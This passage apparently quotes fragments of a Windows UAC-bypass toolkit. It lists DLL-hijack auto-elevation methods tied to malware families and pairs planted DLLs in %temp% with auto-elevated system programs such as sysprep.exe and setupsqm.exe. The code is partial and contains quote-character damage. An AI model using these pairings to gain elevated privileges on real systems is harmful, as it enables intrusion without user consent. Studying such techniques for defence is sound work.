* Leo Davidson AutoElevation method with derivatives.
*
* UacMethodSysprep1 – Original Leo Davidson concept.
* UacMethodSysprep2 – Windows 8.1 adaptation of UacMethodSysprep1 (bypassing the sysprep embedded-manifest DLL redirection).
* UacMethodTilon – Leo Davidson concept with a different target DLL, used by Win32/Tilon.
* UacMethodSysprep3 – Windows 10 TH1 adaptation of UacMethodSysprep1.
* UacMethodOobe – WinNT/Pitou derivative of the Leo Davidson concept.
Typical malware UAC bypass:
/* ucmMasqueradedRenameElementCOM
*
* Purpose:
*
* Rename file/directory autoelevated.
*/
2.
/*
* ucmMasqueradedCreateSubDirectoryCOM
*
* Purpose:
*
* Create directory autoelevated.
*
*/
3.
/*
* ucmMasqueradedMoveFileCOM
*
* Purpose:
*
* Move file autoelevated.
*
*/
4.
/*
* ucmStandardAutoElevation2
*
* Purpose:
*
* Bypass UAC by abusing appinfo g_lpAutoApproveEXEList
*
* UAC contains a whitelist of trusted fusion processes that is keyed only by name, with no other special restrictions.
* Most of them are unknown, and the list is not properly handled by the system itself; the method relies on this.
*
*/
5. /* ucmStandardAutoElevation */
switch (Method) {
case UacMethodSysprep1:
//%temp%\cryptbase.dll
_strcat(szSourceDll, CRYPTBASE_DLL);
//%systemroot%\system32\sysprep
_strcat(szTargetDir, SYSPREP_DIR);
//%systemroot%\system32\sysprep\sysprep.exe
_strcat(szTargetProcess, SYSPREP_DIR);
_strcat(szTargetProcess, SYSPREP_EXE);
break;
case UacMethodSysprep2:
//%temp\\shcore.dll
_strcat(szSourceDll, SHCORE_DLL);
//%systemroot%\system32\sysprep
_strcat(szTargetDir, SYSPREP_DIR);
//%systemroot%\system32\sysprep\sysprep.exe
_strcat(szTargetProcess, SYSPREP_DIR);
_strcat(szTargetProcess, SYSPREP_EXE);
break;
case UacMethodSysprep3:
//%temp%\dbgcore.dll
_strcat(szSourceDll, DBGCORE_DLL);
//%systemroot%\system32\sysprep
_strcat(szTargetDir, SYSPREP_DIR);
//%systemroot%\system32\sysprep\sysprep.exe
_strcat(szTargetProcess, SYSPREP_DIR);
_strcat(szTargetProcess, SYSPREP_EXE);
break;
case UacMethodOobe:
//%temp%\wdscore.dll
_strcat(szSourceDll, WDSCORE_DLL);
//%systemroot%\system32\oobe\”
_strcat(szTargetDir, L”oobe\\”);
//%systemroot%\system32\oobe\setupsqm.exe
_strcat(szTargetProcess, SETUPSQM_EXE);
break;
case UacMethodTilon:
//%temp%\ActionQueue.dll
_strcat(szSourceDll, ACTIONQUEUE_DLL);
//%systemroot%\system32\sysprep
_strcat(szTargetDir, SYSPREP_DIR);
//%systemroot%\system32\sysprep\sysprep.exe
_strcat(szTargetProcess, SYSPREP_DIR);
_strcat(szTargetProcess, SYSPREP_EXE);
break;